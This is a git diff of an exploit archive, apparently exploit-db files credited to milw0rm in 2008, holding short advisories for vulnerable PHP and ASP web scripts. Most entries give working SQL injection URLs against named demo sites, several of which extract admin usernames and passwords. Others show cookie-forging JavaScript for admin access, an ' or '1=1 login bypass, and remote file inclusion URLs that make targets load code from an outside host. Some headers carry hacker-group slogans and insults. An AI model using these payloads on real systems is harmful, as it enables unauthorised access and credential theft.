+# Script : Absolute FAQ Manager http://www.xigla.com/absolutefmnet/demo.htm #
+# Greetz : Allah , All My friend ,www.educ-up.com #
+# ------------------------------- #
+# Poc : #
+# javascript:document.cookie="xlaAFMDEMOadmin=userid=1&lvl=1&s="; #
+# #
+# [~] Exploit #
+# #
+# Go To admin login : http://www.xigla.com/absolutefmnet/demo/login.aspx #
+# Execute JS Code : javascript:document.cookie="xlaAFMDEMOadmin=userid=1&lvl=1&s="; #
+# Now Go to :http://www.xigla.com/absolutefmnet/demo/menu.aspx #
+# #
+# Absolute Products .. Crashed ( Insecure Cookie Vulnerability ) #
+#####################################################################################
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6903.txt b/platforms/php/webapps/6903.txt
index a773e0a45..f875c9f72 100755
--- a/platforms/php/webapps/6903.txt
+++ b/platforms/php/webapps/6903.txt
@@ -1,16 +1,16 @@
-Author : TR-ShaRk
-Web.: Starhack.us Oldkral.Com
-email : admin@tr-shark.org
-Exploit:
-
-showcategory.php?cid=-101+union+select+1,@@version,3,4,5--
-
-Demo:
-
-http://www.turnkeyzone.com/demos/software/showcategory.php?cid=-101+union+select+1,@@version,3,4,5--
-
-Greetz: Webloader, Realwolker , Batty , Ceypower , Aranelworm , Nefret , JACKAL , Str0ke
-
-Bunu Da KAbul etmesen ,....
-
-# milw0rm.com [2008-10-31]
+Author : TR-ShaRk
+Web.: Starhack.us Oldkral.Com
+email : admin@tr-shark.org
+Exploit:
+
+showcategory.php?cid=-101+union+select+1,@@version,3,4,5--
+
+Demo:
+
+http://www.turnkeyzone.com/demos/software/showcategory.php?cid=-101+union+select+1,@@version,3,4,5--
+
+Greetz: Webloader, Realwolker , Batty , Ceypower , Aranelworm , Nefret , JACKAL , Str0ke
+
+Bunu Da KAbul etmesen ,....
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6904.txt b/platforms/php/webapps/6904.txt
index c7157b15e..59179db12 100755
--- a/platforms/php/webapps/6904.txt
+++ b/platforms/php/webapps/6904.txt
@@ -1,20 +1,20 @@
--=======================================-
-Autore: x0r
-Cms = Absolute Newsletter 6.1
-Bug: Insecure Cookie Handling Vulnerability
--=======================================-
-
-
-Exploit:
-javascript:document.cookie="xlaANLDEMOadmin=lvl=1&userid=1&usr=admin&s=TYPE
-A SERIES OF RANDOM NUMBERS AND CHARACTERS HERE; path=/"; and go to
-/menu.aspx
-
-Live Demo: http://www.xigla.com/absolutenl/demo
-
-[-] King Lion Gay
-[+] Margherita Ti Amo...I'm Sorry...
-
-_EOF_
-
-# milw0rm.com [2008-10-31]
+-=======================================-
+Autore: x0r
+Cms = Absolute Newsletter 6.1
+Bug: Insecure Cookie Handling Vulnerability
+-=======================================-
+
+
+Exploit:
+javascript:document.cookie="xlaANLDEMOadmin=lvl=1&userid=1&usr=admin&s=TYPE
+A SERIES OF RANDOM NUMBERS AND CHARACTERS HERE; path=/"; and go to
+/menu.aspx
+
+Live Demo: http://www.xigla.com/absolutenl/demo
+
+[-] King Lion Gay
+[+] Margherita Ti Amo...I'm Sorry...
+
+_EOF_
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6905.txt b/platforms/php/webapps/6905.txt
index 754fcdf4f..b1a6ac843 100755
--- a/platforms/php/webapps/6905.txt
+++ b/platforms/php/webapps/6905.txt
@@ -1,32 +1,32 @@ -####################################################### -# Author : BeyazKurt -# Contact : BeyazKurt@BSDMail.Com -# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP -# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE! -# -# Script : SFS Hosting Directory -# Price: $ 24.95 -# Script Site: http://scripts-for-sites.com/item.php?item=114 -# -# D0rk : "sie go amk. işinizmi yok xD" -# -# SQL Injection Vuln. : -# -# Exploit : SITE.COM/[path]/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/* -# -# Example: http://hostdir.scripts-for-sites.com/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/* -# -# ------------------------------- -# Ya RAMADHAN -# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H) -# pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !! -# Proud 2 Be ALBANIAN ! -# -# bütün emocu,punkci zartci zurtcularin Aq! Anti-Tikky.Com anti-tikiyiz xD -# -# ONEMLI Not Expo Bilisimden host almayin. Serefsizler daha sunucu yonetmeyi bilmiyor bide ustune musteriyi keklemeye calisiyo. Yakinda kanitlariyla r10da yayinlicam ;) -# Demistim rezil edicem sizi ;) -# -####################################################### - -# milw0rm.com [2008-10-31] +####################################################### +# Author : BeyazKurt +# Contact : BeyazKurt@BSDMail.Com +# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP +# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE! +# +# Script : SFS Hosting Directory +# Price: $ 24.95 +# Script Site: http://scripts-for-sites.com/item.php?item=114 +# +# D0rk : "sie go amk. işinizmi yok xD" +# +# SQL Injection Vuln. 
: +# +# Exploit : SITE.COM/[path]/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/* +# +# Example: http://hostdir.scripts-for-sites.com/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/* +# +# ------------------------------- +# Ya RAMADHAN +# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H) +# pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !! +# Proud 2 Be ALBANIAN ! +# +# bütün emocu,punkci zartci zurtcularin Aq! Anti-Tikky.Com anti-tikiyiz xD +# +# ONEMLI Not Expo Bilisimden host almayin. Serefsizler daha sunucu yonetmeyi bilmiyor bide ustune musteriyi keklemeye calisiyo. Yakinda kanitlariyla r10da yayinlicam ;) +# Demistim rezil edicem sizi ;) +# +####################################################### + +# milw0rm.com [2008-10-31] diff --git a/platforms/php/webapps/6906.txt b/platforms/php/webapps/6906.txt index 95d71a9f0..d1e0cfa3e 100755 --- a/platforms/php/webapps/6906.txt +++ b/platforms/php/webapps/6906.txt 
@@ -1,32 +1,32 @@ -####################################################### -# Author : BeyazKurt -# Contact : BeyazKurt@BSDMail.Com -# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP -# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE! -# -# Script : SFS Gaming Directory -# Price: $ 24.95 -# Script Site: http://scripts-for-sites.com/item.php?item=112 -# -# D0rk : "sie go. amk işinizmi yok xD" -# -# SQL Injection Vuln. : -# -# Exploit : SITE.COM/[path]/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/* -# -# Example: http://game.scripts-for-sites.com/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/* -# -# ------------------------------- -# Ya RAMADHAN -# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H) -# pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !! -# Proud 2 Be ALBANIAN ! -# -# bütün emocu,punkci zartci zurtcularin Aq! Anti-Tikky.Com anti-tikiyiz xD -# -# ONEMLI Not Expo Bilisimden host almayin. Serefsizler daha sunucu yonetmeyi bilmiyor bide ustune musteriyi keklemeye calisiyo. Yakinda kanitlariyla r10da yayinlicam ;) -# Demistim rezil edicem sizi ;) -# -####################################################### - -# milw0rm.com [2008-10-31] +####################################################### +# Author : BeyazKurt +# Contact : BeyazKurt@BSDMail.Com +# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP +# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE! +# +# Script : SFS Gaming Directory +# Price: $ 24.95 +# Script Site: http://scripts-for-sites.com/item.php?item=112 +# +# D0rk : "sie go. amk işinizmi yok xD" +# +# SQL Injection Vuln. 
: +# +# Exploit : SITE.COM/[path]/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/* +# +# Example: http://game.scripts-for-sites.com/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/* +# +# ------------------------------- +# Ya RAMADHAN +# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H) +# pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !! +# Proud 2 Be ALBANIAN ! +# +# bütün emocu,punkci zartci zurtcularin Aq! Anti-Tikky.Com anti-tikiyiz xD +# +# ONEMLI Not Expo Bilisimden host almayin. Serefsizler daha sunucu yonetmeyi bilmiyor bide ustune musteriyi keklemeye calisiyo. Yakinda kanitlariyla r10da yayinlicam ;) +# Demistim rezil edicem sizi ;) +# +####################################################### + +# milw0rm.com [2008-10-31] diff --git a/platforms/php/webapps/6907.txt b/platforms/php/webapps/6907.txt index 21b3c86cf..fbc1ae3d0 100755 --- a/platforms/php/webapps/6907.txt +++ b/platforms/php/webapps/6907.txt 
@@ -1,32 +1,32 @@ -####################################################### -# Author : BeyazKurt -# Contact : BeyazKurt@BSDMail.Com -# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP -# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE! -# -# Script : SFS Home Business Directory -# Price: $ 24.95 -# Script Site: http://scripts-for-sites.com/item.php?item=113 -# -# D0rk : "sie go. amk işinizmi yok xD" -# -# SQL Injection Vuln. : -# -# Exploit : SITE.COM/[path]/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/* -# -# Example: http://homebiz.scripts-for-sites.com/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/* -# -# ------------------------------- -# Ya RAMADHAN -# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H) -# pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !! -# Proud 2 Be ALBANIAN ! -# -# bütün emocu,punkci zartci zurtcularin Aq! Anti-Tikky.Com anti-tikiyiz xD -# -# ONEMLI Not Expo Bilisimden host almayin. Serefsizler daha sunucu yonetmeyi bilmiyor bide ustune musteriyi keklemeye calisiyo. Yakinda kanitlariyla r10da yayinlicam ;) -# Demistim rezil edicem sizi ;) -# -####################################################### - -# milw0rm.com [2008-10-31] +####################################################### +# Author : BeyazKurt +# Contact : BeyazKurt@BSDMail.Com +# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP +# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE! +# +# Script : SFS Home Business Directory +# Price: $ 24.95 +# Script Site: http://scripts-for-sites.com/item.php?item=113 +# +# D0rk : "sie go. amk işinizmi yok xD" +# +# SQL Injection Vuln. 
: +# +# Exploit : SITE.COM/[path]/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/* +# +# Example: http://homebiz.scripts-for-sites.com/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/* +# +# ------------------------------- +# Ya RAMADHAN +# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H) +# pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !! +# Proud 2 Be ALBANIAN ! +# +# bütün emocu,punkci zartci zurtcularin Aq! Anti-Tikky.Com anti-tikiyiz xD +# +# ONEMLI Not Expo Bilisimden host almayin. Serefsizler daha sunucu yonetmeyi bilmiyor bide ustune musteriyi keklemeye calisiyo. Yakinda kanitlariyla r10da yayinlicam ;) +# Demistim rezil edicem sizi ;) +# +####################################################### + +# milw0rm.com [2008-10-31] diff --git a/platforms/php/webapps/6908.txt b/platforms/php/webapps/6908.txt index a8fee8b77..cabfd3e1f 100755 --- a/platforms/php/webapps/6908.txt +++ b/platforms/php/webapps/6908.txt 
@@ -1,34 +1,34 @@
-#######################################################
-# Author : BeyazKurt
-# Contact : BeyazKurt@BSDMail.Com
-# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
-# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE!
-# Hack = Empty W0rk ..
-#
-# Script : SFS Link Directory
-# Price: $ 24.95
-# Script Site: http://scripts-for-sites.com/item.php?item=117
-#
-# D0rk : "sie go. amk işinizmi yok xD"
-# sakalan xD bisuru site var : inurl:"links.php?ax=list"
-#
-# SQL Injection Vuln. :
-#
-# Exploit : SITE.COM/[path]/links.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
-#
-# Example: http://link.scripts-for-sites.com/links.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
-#
-# -------------------------------
-# Ya RAMADHAN
-# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
-# pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
-# Proud 2 Be ALBANIAN !
-#
-# bütün emocu,punkci zartci zurtcularin Aq! Anti-Tikky.Com anti-tikiyiz xD
-#
-# ONEMLI Not Expo Bilisimden host almayin. Serefsizler daha sunucu yonetmeyi bilmiyor bide ustune musteriyi keklemeye calisiyo. Yakinda kanitlariyla r10da yayinlicam ;)
-# Demistim rezil edicem sizi ;)
-#
-#######################################################
-
-# milw0rm.com [2008-10-31]
+#######################################################
+# Author : BeyazKurt
+# Contact : BeyazKurt@BSDMail.Com
+# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
+# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE!
+# Hack = Empty W0rk ..
+#
+# Script : SFS Link Directory
+# Price: $ 24.95
+# Script Site: http://scripts-for-sites.com/item.php?item=117
+#
+# D0rk : "sie go. amk işinizmi yok xD"
+# sakalan xD bisuru site var : inurl:"links.php?ax=list"
+#
+# SQL Injection Vuln. :
+#
+# Exploit : SITE.COM/[path]/links.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
+#
+# Example: http://link.scripts-for-sites.com/links.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
+#
+# -------------------------------
+# Ya RAMADHAN
+# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
+# pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
+# Proud 2 Be ALBANIAN !
+#
+# bütün emocu,punkci zartci zurtcularin Aq! Anti-Tikky.Com anti-tikiyiz xD
+#
+# ONEMLI Not Expo Bilisimden host almayin. Serefsizler daha sunucu yonetmeyi bilmiyor bide ustune musteriyi keklemeye calisiyo. Yakinda kanitlariyla r10da yayinlicam ;)
+# Demistim rezil edicem sizi ;)
+#
+#######################################################
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6909.txt b/platforms/php/webapps/6909.txt
index c302c4b3a..fd9a9521a 100755
--- a/platforms/php/webapps/6909.txt
+++ b/platforms/php/webapps/6909.txt
@@ -1,41 +1,41 @@
-|___________________________________________________
-|
-| Adult Banner Exchange Website (targetid) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|-------------------- IQ-SecuritY -------------------
-|
-| Author: Hussin X
-|
-| Home : WwW.IQ-ty.CoM
-|
-| email: darkangel_g85[at]Yahoo[DoT]com
-|
-|___________________________________________________
-|
-| script : http://www.ezonescripts.com/scripts/sls/adultbannerexchange.php
-|
-| DorK : inurl:"click.php?hostid="
-|___________________________________________________
-
-
-Exploit:
-
-www.[target].com/Script/click.php?hostid=1&targetid=-1+union+select+1,version(),user(),4,5--
-
-
-
-
-____________________________( Greetz )_________________________________________
-|
-| All members of the Forum IQ-SecuritY WwW.IQ-ty.CoM | AnD TrYaG WwW.TrYaG.CC
-|
-| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
-|___________________________________________________________________________
-
-
- Im IRAQi | Im TrYaGi
-
-# milw0rm.com [2008-10-31]
+|___________________________________________________
+|
+| Adult Banner Exchange Website (targetid) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|-------------------- IQ-SecuritY -------------------
+|
+| Author: Hussin X
+|
+| Home : WwW.IQ-ty.CoM
+|
+| email: darkangel_g85[at]Yahoo[DoT]com
+|
+|___________________________________________________
+|
+| script : http://www.ezonescripts.com/scripts/sls/adultbannerexchange.php
+|
+| DorK : inurl:"click.php?hostid="
+|___________________________________________________
+
+
+Exploit:
+
+www.[target].com/Script/click.php?hostid=1&targetid=-1+union+select+1,version(),user(),4,5--
+
+
+
+
+____________________________( Greetz )_________________________________________
+|
+| All members of the Forum IQ-SecuritY WwW.IQ-ty.CoM | AnD TrYaG WwW.TrYaG.CC
+|
+| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
+|___________________________________________________________________________
+
+
+ Im IRAQi | Im TrYaGi
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6910.txt b/platforms/php/webapps/6910.txt
index 7391590c2..f079bcf70 100755
--- a/platforms/php/webapps/6910.txt
+++ b/platforms/php/webapps/6910.txt
@@ -1,45 +1,45 @@
-|___________________________________________________
-|
-| EZ BIZ PRO (track.php id) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|-------------------- IQ-SecuritY -------------------
-|
-| Author: Hussin X
-|
-| Home : WwW.IQ-ty.CoM
-|
-| email: darkangel_g85[at]Yahoo[DoT]com
-|
-|___________________________________________________
-|
-| script : http://www.scripts-for-sites.info/item.php?item=131
-|
-| DorK : inurl:"track.php?id="
-|___________________________________________________
-
-
-Exploit
-________
-
-www.[target].com/Script/track.php?id=-2+UNION+SELECT+concat(username,0x3e,password)+FROM+admin--
-
-
-Deom
-________
-
-http://www.turnkeyzone.com/demos/directory/track.php?id=-2+UNION+SELECT+concat(username,0x3e,password)+FROM+admin--
-
-____________________________( Greetz )_________________________________________
-|
-| All members of the Forum IQ-SecuritY WwW.IQ-ty.CoM | AnD TrYaG WwW.TrYaG.CC
-|
-| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
-|___________________________________________________________________________
-
-
- Im IRAQi | Im TrYaGi
-
-# milw0rm.com [2008-10-31]
+|___________________________________________________
+|
+| EZ BIZ PRO (track.php id) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|-------------------- IQ-SecuritY -------------------
+|
+| Author: Hussin X
+|
+| Home : WwW.IQ-ty.CoM
+|
+| email: darkangel_g85[at]Yahoo[DoT]com
+|
+|___________________________________________________
+|
+| script : http://www.scripts-for-sites.info/item.php?item=131
+|
+| DorK : inurl:"track.php?id="
+|___________________________________________________
+
+
+Exploit
+________
+
+www.[target].com/Script/track.php?id=-2+UNION+SELECT+concat(username,0x3e,password)+FROM+admin--
+
+
+Deom
+________
+
+http://www.turnkeyzone.com/demos/directory/track.php?id=-2+UNION+SELECT+concat(username,0x3e,password)+FROM+admin--
+
+____________________________( Greetz )_________________________________________
+|
+| All members of the Forum IQ-SecuritY WwW.IQ-ty.CoM | AnD TrYaG WwW.TrYaG.CC
+|
+| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
+|___________________________________________________________________________
+
+
+ Im IRAQi | Im TrYaGi
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6911.txt b/platforms/php/webapps/6911.txt
index 05daa7734..c1f6ff64b 100755
--- a/platforms/php/webapps/6911.txt
+++ b/platforms/php/webapps/6911.txt
@@ -1,33 +1,33 @@
- SFS EZ Affiliate [cat_id] Remote SQL Injection Vulnerability
- ===============================================================
-
-
-----------------------------------------------------------------
-Application : SFS EZ Affiliate
-Risk : High
-
-----------------------------------------------------------------
-
-Discovered by : d3b4g
-
-email : bl4ckend[at]gmail[dot]come
-
-Site. www.bl4ck3nd.info
-----------------------------------------------------------------
-
-Exploite:http://www.turnkeyzone.com/demos/affiliate/directory.php?ax=list&sub=3&cat_id=[sql]
-
-Version Check:http://www.turnkeyzone.com/demos/affiliate/directory.php?ax=list&sub=3&cat_id=-1+union+all+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13+from+links/*
-
-Demo: http://www.turnkeyzone.com/demos/affiliate/directory.php?ax=list&sub=3&cat_id=-1+union+all+select+1,2,concat_ws(password,email),4,5,6,7,8,9,10,11,12,13+from+links/*
-----------------------------------------------------------------
-
-
-----------------------------------------------------------------
-Greetz: str0ke,All my friends
-
------------------------------------------------------------------
-Proud to be a maldivian :))
-=======================
-
-# milw0rm.com [2008-10-31]
+ SFS EZ Affiliate [cat_id] Remote SQL Injection Vulnerability
+ ===============================================================
+
+
+----------------------------------------------------------------
+Application : SFS EZ Affiliate
+Risk : High
+
+----------------------------------------------------------------
+
+Discovered by : d3b4g
+
+email : bl4ckend[at]gmail[dot]come
+
+Site. www.bl4ck3nd.info
+----------------------------------------------------------------
+
+Exploite:http://www.turnkeyzone.com/demos/affiliate/directory.php?ax=list&sub=3&cat_id=[sql]
+
+Version Check:http://www.turnkeyzone.com/demos/affiliate/directory.php?ax=list&sub=3&cat_id=-1+union+all+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13+from+links/*
+
+Demo: http://www.turnkeyzone.com/demos/affiliate/directory.php?ax=list&sub=3&cat_id=-1+union+all+select+1,2,concat_ws(password,email),4,5,6,7,8,9,10,11,12,13+from+links/*
+----------------------------------------------------------------
+
+
+----------------------------------------------------------------
+Greetz: str0ke,All my friends
+
+-----------------------------------------------------------------
+Proud to be a maldivian :))
+=======================
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6912.txt b/platforms/php/webapps/6912.txt
index a0e3d1acf..c718e86fa 100755
--- a/platforms/php/webapps/6912.txt
+++ b/platforms/php/webapps/6912.txt
@@ -1,24 +1,24 @@ -########################################################################### - ______ __ __ ______ __ ______ - / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ - / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ - / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / - /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ - /____/ - -# Discovered by : Hakxer -# Type Gap : Bybass Login -# Script : Article Publisher Pro : http://www.phparticlescript.com/ -# Greetz : Allah , Egyptian x hacker , Br1ght D@rk -########################################################################## - -[~] Go to http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php -[~] Exploit -[~] In Username Write : admin ' or ' 1=1 -[~] In Password Write any thing Example : Hakxer -[~] Click Login ..! Now You Are In admin panel - -# Proud To be a Muslim # -#_=END=_# - -# milw0rm.com [2008-10-31] +########################################################################### + ______ __ __ ______ __ ______ + / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ + / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ + / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / + /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ + /____/ + +# Discovered by : Hakxer +# Type Gap : Bybass Login +# Script : Article Publisher Pro : http://www.phparticlescript.com/ +# Greetz : Allah , Egyptian x hacker , Br1ght D@rk +########################################################################## + +[~] Go to http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php +[~] Exploit +[~] In Username Write : admin ' or ' 1=1 +[~] In Password Write any thing Example : Hakxer +[~] Click Login ..! Now You Are In admin panel + +# Proud To be a Muslim # +#_=END=_# + +# milw0rm.com [2008-10-31] 
diff --git a/platforms/php/webapps/6913.txt b/platforms/php/webapps/6913.txt
index 289120242..9565d0ed1 100755
--- a/platforms/php/webapps/6913.txt
+++ b/platforms/php/webapps/6913.txt
@@ -1,31 +1,31 @@
- SFS EZ Webring [cat] Remote SQL Injection Vulnerability
- ===============================================================
-
-
-----------------------------------------------------------------
-script : SFS EZ Webring
-Risk : High
-
-----------------------------------------------------------------
-
-Discovered by : d3b4g
-
-email : bl4ckend[at]gmail[dot]come
-
-Site. www.bl4ck3nd.info
-----------------------------------------------------------------
-Vuln:/webring/category.php?cat=[sql]
-
-Demo: http://www.turnkeyzone.com/demos/webring/category.php?cat=-1+union+all+select+1,@@version,3,4,5/*
-
-----------------------------------------------------------------
-
-
-----------------------------------------------------------------
-Greetz: str0ke,All my friends
-
------------------------------------------------------------------
-Proud to be a maldivian :))
-=======================
-
-# milw0rm.com [2008-10-31]
+ SFS EZ Webring [cat] Remote SQL Injection Vulnerability
+ ===============================================================
+
+
+----------------------------------------------------------------
+script : SFS EZ Webring
+Risk : High
+
+----------------------------------------------------------------
+
+Discovered by : d3b4g
+
+email : bl4ckend[at]gmail[dot]come
+
+Site. www.bl4ck3nd.info
+----------------------------------------------------------------
+Vuln:/webring/category.php?cat=[sql]
+
+Demo: http://www.turnkeyzone.com/demos/webring/category.php?cat=-1+union+all+select+1,@@version,3,4,5/*
+
+----------------------------------------------------------------
+
+
+----------------------------------------------------------------
+Greetz: str0ke,All my friends
+
+-----------------------------------------------------------------
+Proud to be a maldivian :))
+=======================
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6914.txt b/platforms/php/webapps/6914.txt
index c7c460f43..a3de4108d 100755
--- a/platforms/php/webapps/6914.txt
+++ b/platforms/php/webapps/6914.txt
@@ -1,37 +1,37 @@
- SFS EZ Hot ot Not[viewcomments.php?phid] Remote SQL Injection Vulnerability
- ===============================================================
-
-
-----------------------------------------------------------------
-script : SFS EZ Hot ot Not
-
-script : http://www.scripts-for-sites.info
-
-Risk : High
-
-----------------------------------------------------------------
-
-Discovered by : d3b4g
-
-email : bl4ckend[at]gmail[dot]come
-
-Site. www.bl4ck3nd.info
-
-----------------------------------------------------------------
-Exploit demo: http://www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,concat(password,username),3,4,5,6+from+admin/*
-
-
-version: http: www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,@@version,3,4,5,6/*
-----------------------------------------------------------------
-
-
-----------------------------------------------------------------
-Greetz: str0ke,,Hotlism.org,All my friends
-
------------------------------------------------------------------
-Proud to be a maldivian :))
-=======================
-
-----------------------------------------------------------------
-
-# milw0rm.com [2008-10-31]
+ SFS EZ Hot ot Not[viewcomments.php?phid] Remote SQL Injection Vulnerability
+ ===============================================================
+
+
+----------------------------------------------------------------
+script : SFS EZ Hot ot Not
+
+script : http://www.scripts-for-sites.info
+
+Risk : High
+
+----------------------------------------------------------------
+
+Discovered by : d3b4g
+
+email : bl4ckend[at]gmail[dot]come
+
+Site. www.bl4ck3nd.info
+
+----------------------------------------------------------------
+Exploit demo: http://www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,concat(password,username),3,4,5,6+from+admin/*
+
+
+version: http: www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,@@version,3,4,5,6/*
+----------------------------------------------------------------
+
+
+----------------------------------------------------------------
+Greetz: str0ke,,Hotlism.org,All my friends
+
+-----------------------------------------------------------------
+Proud to be a maldivian :))
+=======================
+
+----------------------------------------------------------------
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6915.txt b/platforms/php/webapps/6915.txt
index 969da2144..583405f81 100755
--- a/platforms/php/webapps/6915.txt
+++ b/platforms/php/webapps/6915.txt
@@ -1,15 +1,15 @@
--=====================================-
-Application : SFS EZ Software
-Risk : High
-FOund By: x0r
--=====================================-
-
-Exploit: software/software-description.php?id=-5 union all select
-1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
-
-Live Demo:
-http://www.turnkeyzone.com/demos/software/software-description.php?id=-5%20union%20all%20select%201,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
-
--=EOF=-
-
-# milw0rm.com [2008-10-31]
+-=====================================-
+Application : SFS EZ Software
+Risk : High
+FOund By: x0r
+-=====================================-
+
+Exploit: software/software-description.php?id=-5 union all select
+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
+
+Live Demo:
+http://www.turnkeyzone.com/demos/software/software-description.php?id=-5%20union%20all%20select%201,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
+
+-=EOF=-
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6916.txt b/platforms/php/webapps/6916.txt
index 8408d4539..94ded1110 100755
--- a/platforms/php/webapps/6916.txt
+++ b/platforms/php/webapps/6916.txt
@@ -1,20 +1,20 @@
-**************************************************************************************
-ModernBill .:. Client Billing System - User Login
-ModernBill <= v4.4.X Remote File Inclusion Vulnerability and xss by nigh7f411
-http://xc0r3.net/
-plezz go to ttp://xc0r3.net/forums/
-**************************************************************************************
-
-rfi
-http://poop.com/include/scripts/export_batch.inc.php?DIR=http://xc0r3.net/x2300.txt?
-http://poop.com/include/scripts/run_auto_suspend.cron.php?DIR=http://xc0r3.net/x2300.txt?
-http://poop.com/include/scripts/send_email_cache.php?DIR=http://xc0r3.net/x2300.txt?
-http://poop.com/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=http://xc0r3.net/x2300.txt?
-http://poop.com/include/html/nettools.popup.php?DIR=http://xc0r3.net/x2300.txt?
-
-xss
